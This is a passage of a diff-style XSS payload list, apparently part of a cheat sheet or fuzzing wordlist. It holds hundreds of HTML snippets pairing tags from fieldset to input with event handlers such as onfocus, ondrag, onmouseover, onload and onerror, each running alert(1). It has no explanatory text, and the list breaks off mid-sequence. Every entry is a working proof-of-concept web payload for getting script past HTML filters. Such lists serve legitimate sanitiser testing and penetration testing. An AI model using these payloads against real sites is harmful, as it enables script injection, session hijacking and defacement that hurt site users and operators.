+<fieldset onpaste="alert(1)" contenteditable>test</fieldset> +<figcaption draggable="true" ondrag="alert(1)">test</figcaption> +<figcaption draggable="true" ondragend="alert(1)">test</figcaption> +<figcaption draggable="true" ondragenter="alert(1)">test</figcaption> +<figcaption draggable="true" ondragleave="alert(1)">test</figcaption> +<figcaption draggable="true" ondragstart="alert(1)">test</figcaption> +<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> +<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> +<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> +<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onclick="alert(1)">test</figcaption> +<figcaption oncontextmenu="alert(1)">test</figcaption> +<figcaption oncopy="alert(1)" contenteditable>test</figcaption> +<figcaption oncut="alert(1)" contenteditable>test</figcaption> +<figcaption ondblclick="alert(1)">test</figcaption> +<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onkeydown="alert(1)" contenteditable>test</figcaption> +<figcaption onkeypress="alert(1)" contenteditable>test</figcaption> +<figcaption onkeyup="alert(1)" contenteditable>test</figcaption> +<figcaption onmousedown="alert(1)">test</figcaption> +<figcaption onmouseenter="alert(1)">test</figcaption> +<figcaption onmouseleave="alert(1)">test</figcaption> +<figcaption onmousemove="alert(1)">test</figcaption> +<figcaption onmouseout="alert(1)">test</figcaption> +<figcaption 
onmouseover="alert(1)">test</figcaption> +<figcaption onmouseup="alert(1)">test</figcaption> +<figcaption onpaste="alert(1)" contenteditable>test</figcaption> +<figure draggable="true" ondrag="alert(1)">test</figure> +<figure draggable="true" ondragend="alert(1)">test</figure> +<figure draggable="true" ondragenter="alert(1)">test</figure> +<figure draggable="true" ondragleave="alert(1)">test</figure> +<figure draggable="true" ondragstart="alert(1)">test</figure> +<figure id=x tabindex=1 onactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> +<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> +<figure id=x tabindex=1 onfocus=alert(1)></figure> +<figure id=x tabindex=1 onfocusin=alert(1)></figure> +<figure onbeforecopy="alert(1)" contenteditable>test</figure> +<figure onbeforecut="alert(1)" contenteditable>test</figure> +<figure onbeforepaste="alert(1)" contenteditable>test</figure> +<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onclick="alert(1)">test</figure> +<figure oncontextmenu="alert(1)">test</figure> +<figure oncopy="alert(1)" contenteditable>test</figure> +<figure oncut="alert(1)" contenteditable>test</figure> +<figure ondblclick="alert(1)">test</figure> +<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onkeydown="alert(1)" contenteditable>test</figure> +<figure onkeypress="alert(1)" contenteditable>test</figure> +<figure onkeyup="alert(1)" contenteditable>test</figure> +<figure onmousedown="alert(1)">test</figure> +<figure onmouseenter="alert(1)">test</figure> +<figure onmouseleave="alert(1)">test</figure> +<figure onmousemove="alert(1)">test</figure> +<figure onmouseout="alert(1)">test</figure> +<figure onmouseover="alert(1)">test</figure> +<figure onmouseup="alert(1)">test</figure> +<figure onpaste="alert(1)" contenteditable>test</figure> +<font 
draggable="true" ondrag="alert(1)">test</font> +<font draggable="true" ondragend="alert(1)">test</font> +<font draggable="true" ondragenter="alert(1)">test</font> +<font draggable="true" ondragleave="alert(1)">test</font> +<font draggable="true" ondragstart="alert(1)">test</font> +<font id=x tabindex=1 onactivate=alert(1)></font> +<font id=x tabindex=1 onbeforeactivate=alert(1)></font> +<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> +<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> +<font id=x tabindex=1 onfocus=alert(1)></font> +<font id=x tabindex=1 onfocusin=alert(1)></font> +<font onbeforecopy="alert(1)" contenteditable>test</font> +<font onbeforecut="alert(1)" contenteditable>test</font> +<font onbeforepaste="alert(1)" contenteditable>test</font> +<font onblur=alert(1) tabindex=1 id=x></font><input autofocus> +<font onclick="alert(1)">test</font> +<font oncontextmenu="alert(1)">test</font> +<font oncopy="alert(1)" contenteditable>test</font> +<font oncut="alert(1)" contenteditable>test</font> +<font ondblclick="alert(1)">test</font> +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> +<font onkeydown="alert(1)" contenteditable>test</font> +<font onkeypress="alert(1)" contenteditable>test</font> +<font onkeyup="alert(1)" contenteditable>test</font> +<font onmousedown="alert(1)">test</font> +<font onmouseenter="alert(1)">test</font> +<font onmouseleave="alert(1)">test</font> +<font onmousemove="alert(1)">test</font> +<font onmouseout="alert(1)">test</font> +<font onmouseover="alert(1)">test</font> +<font onmouseup="alert(1)">test</font> +<font onpaste="alert(1)" contenteditable>test</font> +<footer draggable="true" ondrag="alert(1)">test</footer> +<footer draggable="true" ondragend="alert(1)">test</footer> +<footer draggable="true" ondragenter="alert(1)">test</footer> +<footer draggable="true" ondragleave="alert(1)">test</footer> +<footer draggable="true" ondragstart="alert(1)">test</footer> 
+<footer id=x tabindex=1 onactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> +<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> +<footer id=x tabindex=1 onfocus=alert(1)></footer> +<footer id=x tabindex=1 onfocusin=alert(1)></footer> +<footer onbeforecopy="alert(1)" contenteditable>test</footer> +<footer onbeforecut="alert(1)" contenteditable>test</footer> +<footer onbeforepaste="alert(1)" contenteditable>test</footer> +<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onclick="alert(1)">test</footer> +<footer oncontextmenu="alert(1)">test</footer> +<footer oncopy="alert(1)" contenteditable>test</footer> +<footer oncut="alert(1)" contenteditable>test</footer> +<footer ondblclick="alert(1)">test</footer> +<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onkeydown="alert(1)" contenteditable>test</footer> +<footer onkeypress="alert(1)" contenteditable>test</footer> +<footer onkeyup="alert(1)" contenteditable>test</footer> +<footer onmousedown="alert(1)">test</footer> +<footer onmouseenter="alert(1)">test</footer> +<footer onmouseleave="alert(1)">test</footer> +<footer onmousemove="alert(1)">test</footer> +<footer onmouseout="alert(1)">test</footer> +<footer onmouseover="alert(1)">test</footer> +<footer onmouseup="alert(1)">test</footer> +<footer onpaste="alert(1)" contenteditable>test</footer> +<form draggable="true" ondrag="alert(1)">test</form> +<form draggable="true" ondragend="alert(1)">test</form> +<form draggable="true" ondragenter="alert(1)">test</form> +<form draggable="true" ondragleave="alert(1)">test</form> +<form draggable="true" ondragstart="alert(1)">test</form> +<form id=x tabindex=1 onactivate=alert(1)></form> +<form id=x tabindex=1 onbeforeactivate=alert(1)></form> +<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> +<form id=x 
tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> +<form id=x tabindex=1 onfocus=alert(1)></form> +<form id=x tabindex=1 onfocusin=alert(1)></form> +<form onbeforecopy="alert(1)" contenteditable>test</form> +<form onbeforecut="alert(1)" contenteditable>test</form> +<form onbeforepaste="alert(1)" contenteditable>test</form> +<form onblur=alert(1) tabindex=1 id=x></form><input autofocus> +<form onclick="alert(1)">test</form> +<form oncontextmenu="alert(1)">test</form> +<form oncopy="alert(1)" contenteditable>test</form> +<form oncut="alert(1)" contenteditable>test</form> +<form ondblclick="alert(1)">test</form> +<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> +<form onkeydown="alert(1)" contenteditable>test</form> +<form onkeypress="alert(1)" contenteditable>test</form> +<form onkeyup="alert(1)" contenteditable>test</form> +<form onmousedown="alert(1)">test</form> +<form onmouseenter="alert(1)">test</form> +<form onmouseleave="alert(1)">test</form> +<form onmousemove="alert(1)">test</form> +<form onmouseout="alert(1)">test</form> +<form onmouseover="alert(1)">test</form> +<form onmouseup="alert(1)">test</form> +<form onpaste="alert(1)" contenteditable>test</form> +<form onreset=alert(1)><input type=reset> +<form onsubmit=alert(1)><input type=submit> +<form><input oninvalid=alert(1) required><input type=submit> +<form><input type=search onsearch=alert(1) value="Hit return" autofocus> +<form><textarea oninvalid=alert(1) required><input type=submit> +<frame draggable="true" ondrag="alert(1)">test</frame> +<frame draggable="true" ondragend="alert(1)">test</frame> +<frame draggable="true" ondragenter="alert(1)">test</frame> +<frame draggable="true" ondragleave="alert(1)">test</frame> +<frame draggable="true" ondragstart="alert(1)">test</frame> +<frame id=x tabindex=1 onactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> +<frame 
id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> +<frame onbeforecopy="alert(1)" contenteditable>test</frame> +<frame onbeforecut="alert(1)" contenteditable>test</frame> +<frame onbeforepaste="alert(1)" contenteditable>test</frame> +<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onclick="alert(1)">test</frame> +<frame oncontextmenu="alert(1)">test</frame> +<frame oncopy="alert(1)" contenteditable>test</frame> +<frame oncut="alert(1)" contenteditable>test</frame> +<frame ondblclick="alert(1)">test</frame> +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onkeydown="alert(1)" contenteditable>test</frame> +<frame onkeypress="alert(1)" contenteditable>test</frame> +<frame onkeyup="alert(1)" contenteditable>test</frame> +<frame onmousedown="alert(1)">test</frame> +<frame onmouseenter="alert(1)">test</frame> +<frame onmouseleave="alert(1)">test</frame> +<frame onmousemove="alert(1)">test</frame> +<frame onmouseout="alert(1)">test</frame> +<frame onmouseover="alert(1)">test</frame> +<frame onmouseup="alert(1)">test</frame> +<frame onpaste="alert(1)" contenteditable>test</frame> +<frameset draggable="true" ondrag="alert(1)">test</frameset> +<frameset draggable="true" ondragend="alert(1)">test</frameset> +<frameset draggable="true" ondragenter="alert(1)">test</frameset> +<frameset draggable="true" ondragleave="alert(1)">test</frameset> +<frameset draggable="true" ondragstart="alert(1)">test</frameset> +<frameset id=x tabindex=1 onactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> +<frameset id=x tabindex=1 onfocus=alert(1)></frameset> +<frameset id=x tabindex=1 onfocusin=alert(1)></frameset> +<frameset onbeforecopy="alert(1)" contenteditable>test</frameset> +<frameset onbeforecut="alert(1)" 
contenteditable>test</frameset> +<frameset onbeforepaste="alert(1)" contenteditable>test</frameset> +<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onclick="alert(1)">test</frameset> +<frameset oncontextmenu="alert(1)">test</frameset> +<frameset oncopy="alert(1)" contenteditable>test</frameset> +<frameset oncut="alert(1)" contenteditable>test</frameset> +<frameset ondblclick="alert(1)">test</frameset> +<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onkeydown="alert(1)" contenteditable>test</frameset> +<frameset onkeypress="alert(1)" contenteditable>test</frameset> +<frameset onkeyup="alert(1)" contenteditable>test</frameset> +<frameset onmousedown="alert(1)">test</frameset> +<frameset onmouseenter="alert(1)">test</frameset> +<frameset onmouseleave="alert(1)">test</frameset> +<frameset onmousemove="alert(1)">test</frameset> +<frameset onmouseout="alert(1)">test</frameset> +<frameset onmouseover="alert(1)">test</frameset> +<frameset onmouseup="alert(1)">test</frameset> +<frameset onpageshow=alert(1)> +<frameset onpaste="alert(1)" contenteditable>test</frameset> +<frameset><frame id=x onfocus=alert(1)> +<frameset><frame id=x onfocusin=alert(1)> +<frameset><frame onload=alert(1)> +<h1 draggable="true" ondrag="alert(1)">test</h1> +<h1 draggable="true" ondragend="alert(1)">test</h1> +<h1 draggable="true" ondragenter="alert(1)">test</h1> +<h1 draggable="true" ondragleave="alert(1)">test</h1> +<h1 draggable="true" ondragstart="alert(1)">test</h1> +<h1 id=x tabindex=1 onactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> +<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> +<h1 id=x tabindex=1 onfocus=alert(1)></h1> +<h1 id=x tabindex=1 onfocusin=alert(1)></h1> +<h1 onbeforecopy="alert(1)" contenteditable>test</h1> +<h1 onbeforecut="alert(1)" contenteditable>test</h1> +<h1 
onbeforepaste="alert(1)" contenteditable>test</h1> +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onclick="alert(1)">test</h1> +<h1 oncontextmenu="alert(1)">test</h1> +<h1 oncopy="alert(1)" contenteditable>test</h1> +<h1 oncut="alert(1)" contenteditable>test</h1> +<h1 ondblclick="alert(1)">test</h1> +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onkeydown="alert(1)" contenteditable>test</h1> +<h1 onkeypress="alert(1)" contenteditable>test</h1> +<h1 onkeyup="alert(1)" contenteditable>test</h1> +<h1 onmousedown="alert(1)">test</h1> +<h1 onmouseenter="alert(1)">test</h1> +<h1 onmouseleave="alert(1)">test</h1> +<h1 onmousemove="alert(1)">test</h1> +<h1 onmouseout="alert(1)">test</h1> +<h1 onmouseover="alert(1)">test</h1> +<h1 onmouseup="alert(1)">test</h1> +<h1 onpaste="alert(1)" contenteditable>test</h1> +<head draggable="true" ondrag="alert(1)">test</head> +<head draggable="true" ondragend="alert(1)">test</head> +<head draggable="true" ondragenter="alert(1)">test</head> +<head draggable="true" ondragleave="alert(1)">test</head> +<head draggable="true" ondragstart="alert(1)">test</head> +<head id=x tabindex=1 onactivate=alert(1)></head> +<head id=x tabindex=1 onbeforeactivate=alert(1)></head> +<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> +<head id=x tabindex=1 onfocus=alert(1)></head> +<head id=x tabindex=1 onfocusin=alert(1)></head> +<head onbeforecopy="alert(1)" contenteditable>test</head> +<head onbeforecut="alert(1)" contenteditable>test</head> +<head onbeforepaste="alert(1)" contenteditable>test</head> +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus> +<head onclick="alert(1)">test</head> +<head oncontextmenu="alert(1)">test</head> +<head oncopy="alert(1)" contenteditable>test</head> +<head oncut="alert(1)" contenteditable>test</head> +<head ondblclick="alert(1)">test</head> +<head onfocusout=alert(1) 
tabindex=1 id=x></head><input autofocus> +<head onkeydown="alert(1)" contenteditable>test</head> +<head onkeypress="alert(1)" contenteditable>test</head> +<head onkeyup="alert(1)" contenteditable>test</head> +<head onmousedown="alert(1)">test</head> +<head onmouseenter="alert(1)">test</head> +<head onmouseleave="alert(1)">test</head> +<head onmousemove="alert(1)">test</head> +<head onmouseout="alert(1)">test</head> +<head onmouseover="alert(1)">test</head> +<head onmouseup="alert(1)">test</head> +<head onpaste="alert(1)" contenteditable>test</head> +<header draggable="true" ondrag="alert(1)">test</header> +<header draggable="true" ondragend="alert(1)">test</header> +<header draggable="true" ondragenter="alert(1)">test</header> +<header draggable="true" ondragleave="alert(1)">test</header> +<header draggable="true" ondragstart="alert(1)">test</header> +<header id=x tabindex=1 onactivate=alert(1)></header> +<header id=x tabindex=1 onbeforeactivate=alert(1)></header> +<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> +<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> +<header id=x tabindex=1 onfocus=alert(1)></header> +<header id=x tabindex=1 onfocusin=alert(1)></header> +<header onbeforecopy="alert(1)" contenteditable>test</header> +<header onbeforecut="alert(1)" contenteditable>test</header> +<header onbeforepaste="alert(1)" contenteditable>test</header> +<header onblur=alert(1) tabindex=1 id=x></header><input autofocus> +<header onclick="alert(1)">test</header> +<header oncontextmenu="alert(1)">test</header> +<header oncopy="alert(1)" contenteditable>test</header> +<header oncut="alert(1)" contenteditable>test</header> +<header ondblclick="alert(1)">test</header> +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> +<header onkeydown="alert(1)" contenteditable>test</header> +<header onkeypress="alert(1)" contenteditable>test</header> +<header onkeyup="alert(1)" contenteditable>test</header> 
+<header onmousedown="alert(1)">test</header> +<header onmouseenter="alert(1)">test</header> +<header onmouseleave="alert(1)">test</header> +<header onmousemove="alert(1)">test</header> +<header onmouseout="alert(1)">test</header> +<header onmouseover="alert(1)">test</header> +<header onmouseup="alert(1)">test</header> +<header onpaste="alert(1)" contenteditable>test</header> +<hgroup draggable="true" ondrag="alert(1)">test</hgroup> +<hgroup draggable="true" ondragend="alert(1)">test</hgroup> +<hgroup draggable="true" ondragenter="alert(1)">test</hgroup> +<hgroup draggable="true" ondragleave="alert(1)">test</hgroup> +<hgroup draggable="true" ondragstart="alert(1)">test</hgroup> +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> +<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> +<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onclick="alert(1)">test</hgroup> +<hgroup oncontextmenu="alert(1)">test</hgroup> +<hgroup oncopy="alert(1)" contenteditable>test</hgroup> +<hgroup oncut="alert(1)" contenteditable>test</hgroup> +<hgroup ondblclick="alert(1)">test</hgroup> +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onkeydown="alert(1)" contenteditable>test</hgroup> +<hgroup onkeypress="alert(1)" contenteditable>test</hgroup> +<hgroup onkeyup="alert(1)" contenteditable>test</hgroup> +<hgroup onmousedown="alert(1)">test</hgroup> +<hgroup onmouseenter="alert(1)">test</hgroup> +<hgroup onmouseleave="alert(1)">test</hgroup> +<hgroup 
onmousemove="alert(1)">test</hgroup> +<hgroup onmouseout="alert(1)">test</hgroup> +<hgroup onmouseover="alert(1)">test</hgroup> +<hgroup onmouseup="alert(1)">test</hgroup> +<hgroup onpaste="alert(1)" contenteditable>test</hgroup> +<hr draggable="true" ondrag="alert(1)">test</hr> +<hr draggable="true" ondragend="alert(1)">test</hr> +<hr draggable="true" ondragenter="alert(1)">test</hr> +<hr draggable="true" ondragleave="alert(1)">test</hr> +<hr draggable="true" ondragstart="alert(1)">test</hr> +<hr id=x tabindex=1 onactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> +<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> +<hr id=x tabindex=1 onfocus=alert(1)></hr> +<hr id=x tabindex=1 onfocusin=alert(1)></hr> +<hr onbeforecopy="alert(1)" contenteditable>test</hr> +<hr onbeforecut="alert(1)" contenteditable>test</hr> +<hr onbeforepaste="alert(1)" contenteditable>test</hr> +<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onclick="alert(1)">test</hr> +<hr oncontextmenu="alert(1)">test</hr> +<hr oncopy="alert(1)" contenteditable>test</hr> +<hr oncut="alert(1)" contenteditable>test</hr> +<hr ondblclick="alert(1)">test</hr> +<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onkeydown="alert(1)" contenteditable>test</hr> +<hr onkeypress="alert(1)" contenteditable>test</hr> +<hr onkeyup="alert(1)" contenteditable>test</hr> +<hr onmousedown="alert(1)">test</hr> +<hr onmouseenter="alert(1)">test</hr> +<hr onmouseleave="alert(1)">test</hr> +<hr onmousemove="alert(1)">test</hr> +<hr onmouseout="alert(1)">test</hr> +<hr onmouseover="alert(1)">test</hr> +<hr onmouseup="alert(1)">test</hr> +<hr onpaste="alert(1)" contenteditable>test</hr> +<html draggable="true" ondrag="alert(1)">test</html> +<html draggable="true" ondragend="alert(1)">test</html> +<html draggable="true" ondragenter="alert(1)">test</html> +<html draggable="true" 
ondragleave="alert(1)">test</html> +<html draggable="true" ondragstart="alert(1)">test</html> +<html id=x tabindex=1 onactivate=alert(1)></html> +<html id=x tabindex=1 onbeforeactivate=alert(1)></html> +<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> +<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> +<html id=x tabindex=1 onfocus=alert(1)></html> +<html id=x tabindex=1 onfocusin=alert(1)></html> +<html onbeforecopy="alert(1)" contenteditable>test</html> +<html onbeforecut="alert(1)" contenteditable>test</html> +<html onbeforepaste="alert(1)" contenteditable>test</html> +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus> +<html onclick="alert(1)">test</html> +<html oncontextmenu="alert(1)">test</html> +<html oncopy="alert(1)" contenteditable>test</html> +<html oncut="alert(1)" contenteditable>test</html> +<html ondblclick="alert(1)">test</html> +<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> +<html onkeydown="alert(1)" contenteditable>test</html> +<html onkeypress="alert(1)" contenteditable>test</html> +<html onkeyup="alert(1)" contenteditable>test</html> +<html onmousedown="alert(1)">test</html> +<html onmouseenter="alert(1)">test</html> +<html onmouseleave="alert(1)">test</html> +<html onmousemove="alert(1)">test</html> +<html onmouseout="alert(1)">test</html> +<html onmouseover="alert(1)">test</html> +<html onmouseup="alert(1)">test</html> +<html onpaste="alert(1)" contenteditable>test</html> +<i draggable="true" ondrag="alert(1)">test</i> +<i draggable="true" ondragend="alert(1)">test</i> +<i draggable="true" ondragenter="alert(1)">test</i> +<i draggable="true" ondragleave="alert(1)">test</i> +<i draggable="true" ondragstart="alert(1)">test</i> +<i id=x tabindex=1 onactivate=alert(1)></i> +<i id=x tabindex=1 onbeforeactivate=alert(1)></i> +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> +<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> +<i 
id=x tabindex=1 onfocus=alert(1)></i> +<i id=x tabindex=1 onfocusin=alert(1)></i> +<i onbeforecopy="alert(1)" contenteditable>test</i> +<i onbeforecut="alert(1)" contenteditable>test</i> +<i onbeforepaste="alert(1)" contenteditable>test</i> +<i onblur=alert(1) tabindex=1 id=x></i><input autofocus> +<i onclick="alert(1)">test</i> +<i oncontextmenu="alert(1)">test</i> +<i oncopy="alert(1)" contenteditable>test</i> +<i oncut="alert(1)" contenteditable>test</i> +<i ondblclick="alert(1)">test</i> +<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> +<i onkeydown="alert(1)" contenteditable>test</i> +<i onkeypress="alert(1)" contenteditable>test</i> +<i onkeyup="alert(1)" contenteditable>test</i> +<i onmousedown="alert(1)">test</i> +<i onmouseenter="alert(1)">test</i> +<i onmouseleave="alert(1)">test</i> +<i onmousemove="alert(1)">test</i> +<i onmouseout="alert(1)">test</i> +<i onmouseover="alert(1)">test</i> +<i onmouseup="alert(1)">test</i> +<i onpaste="alert(1)" contenteditable>test</i> +<iframe draggable="true" ondrag="alert(1)">test</iframe> +<iframe draggable="true" ondragend="alert(1)">test</iframe> +<iframe draggable="true" ondragenter="alert(1)">test</iframe> +<iframe draggable="true" ondragleave="alert(1)">test</iframe> +<iframe draggable="true" ondragstart="alert(1)">test</iframe> +<iframe id=x onfocus=alert(1)> +<iframe id=x onfocusin=alert(1)> +<iframe id=x tabindex=1 onactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus> +<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> +<iframe onbeforecopy="alert(1)" contenteditable>test</iframe> +<iframe onbeforecut="alert(1)" contenteditable>test</iframe> +<iframe onbeforepaste="alert(1)" contenteditable>test</iframe> +<iframe onblur=alert(1) id=x><input autofocus> +<iframe onclick="alert(1)">test</iframe> +<iframe oncontextmenu="alert(1)">test</iframe> +<iframe 
oncopy="alert(1)" contenteditable>test</iframe> +<iframe oncut="alert(1)" contenteditable>test</iframe> +<iframe ondblclick="alert(1)">test</iframe> +<iframe onfocusout=alert(1) id=x><input autofocus> +<iframe onkeydown="alert(1)" contenteditable>test</iframe> +<iframe onkeypress="alert(1)" contenteditable>test</iframe> +<iframe onkeyup="alert(1)" contenteditable>test</iframe> +<iframe onload=alert(1)></iframe> +<iframe onmousedown="alert(1)">test</iframe> +<iframe onmouseenter="alert(1)">test</iframe> +<iframe onmouseleave="alert(1)">test</iframe> +<iframe onmousemove="alert(1)">test</iframe> +<iframe onmouseout="alert(1)">test</iframe> +<iframe onmouseover="alert(1)">test</iframe> +<iframe onmouseup="alert(1)">test</iframe> +<iframe onpaste="alert(1)" contenteditable>test</iframe> +<iframe onreadystatechange=alert(1)></iframe> +<image draggable="true" ondrag="alert(1)">test</image> +<image draggable="true" ondragend="alert(1)">test</image> +<image draggable="true" ondragenter="alert(1)">test</image> +<image draggable="true" ondragleave="alert(1)">test</image> +<image draggable="true" ondragstart="alert(1)">test</image> +<image id=x tabindex=1 onactivate=alert(1)></image> +<image id=x tabindex=1 onbeforeactivate=alert(1)></image> +<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> +<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> +<image id=x tabindex=1 onfocus=alert(1)></image> +<image id=x tabindex=1 onfocusin=alert(1)></image> +<image onbeforecopy="alert(1)" contenteditable>test</image> +<image onbeforecut="alert(1)" contenteditable>test</image> +<image onbeforepaste="alert(1)" contenteditable>test</image> +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus> +<image onclick="alert(1)">test</image> +<image oncontextmenu="alert(1)">test</image> +<image oncopy="alert(1)" contenteditable>test</image> +<image oncut="alert(1)" contenteditable>test</image> +<image ondblclick="alert(1)">test</image> 
+<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> +<image onkeydown="alert(1)" contenteditable>test</image> +<image onkeypress="alert(1)" contenteditable>test</image> +<image onkeyup="alert(1)" contenteditable>test</image> +<image onmousedown="alert(1)">test</image> +<image onmouseenter="alert(1)">test</image> +<image onmouseleave="alert(1)">test</image> +<image onmousemove="alert(1)">test</image> +<image onmouseout="alert(1)">test</image> +<image onmouseover="alert(1)">test</image> +<image onmouseup="alert(1)">test</image> +<image onpaste="alert(1)" contenteditable>test</image> +<image src/onerror=alert(1)> +<image src=validimage.png onload=alert(1)> +<image src=validimage.png onloadend=alert(1)> +<image src=validimage.png onloadstart=alert(1)> +<image srcset=1 onerror=alert(1)> +<img draggable="true" ondrag="alert(1)">test</img> +<img draggable="true" ondragend="alert(1)">test</img> +<img draggable="true" ondragenter="alert(1)">test</img> +<img draggable="true" ondragleave="alert(1)">test</img> +<img draggable="true" ondragstart="alert(1)">test</img> +<img id=x tabindex=1 onactivate=alert(1)></img> +<img id=x tabindex=1 onbeforeactivate=alert(1)></img> +<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> +<img id=x tabindex=1 onfocus=alert(1)></img> +<img id=x tabindex=1 onfocusin=alert(1)></img> +<img onbeforecopy="alert(1)" contenteditable>test</img> +<img onbeforecut="alert(1)" contenteditable>test</img> +<img onbeforepaste="alert(1)" contenteditable>test</img> +<img onblur=alert(1) tabindex=1 id=x></img><input autofocus> +<img onclick="alert(1)">test</img> +<img oncontextmenu="alert(1)">test</img> +<img oncopy="alert(1)" contenteditable>test</img> +<img oncut="alert(1)" contenteditable>test</img> +<img ondblclick="alert(1)">test</img> +<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> +<img onkeydown="alert(1)" 
contenteditable>test</img> +<img onkeypress="alert(1)" contenteditable>test</img> +<img onkeyup="alert(1)" contenteditable>test</img> +<img onmousedown="alert(1)">test</img> +<img onmouseenter="alert(1)">test</img> +<img onmouseleave="alert(1)">test</img> +<img onmousemove="alert(1)">test</img> +<img onmouseout="alert(1)">test</img> +<img onmouseover="alert(1)">test</img> +<img onmouseup="alert(1)">test</img> +<img onpaste="alert(1)" contenteditable>test</img> +<img src/onerror=alert(1)> +<img src=validimage.png onload=alert(1)> +<img src=validimage.png onloadend=alert(1)> +<img src=validimage.png onloadstart=alert(1)> +<img srcset=1 onerror=alert(1)> +<img srcset=validimage.png onload=alert(1)> +<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> +<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> +<input autofocus onfocus=alert(1)> +<input autofocus onfocusin=alert(1)> +<input draggable="true" ondrag="alert(1)">test</input> +<input draggable="true" ondragend="alert(1)">test</input> +<input draggable="true" ondragenter="alert(1)">test</input> +<input draggable="true" ondragleave="alert(1)">test</input> 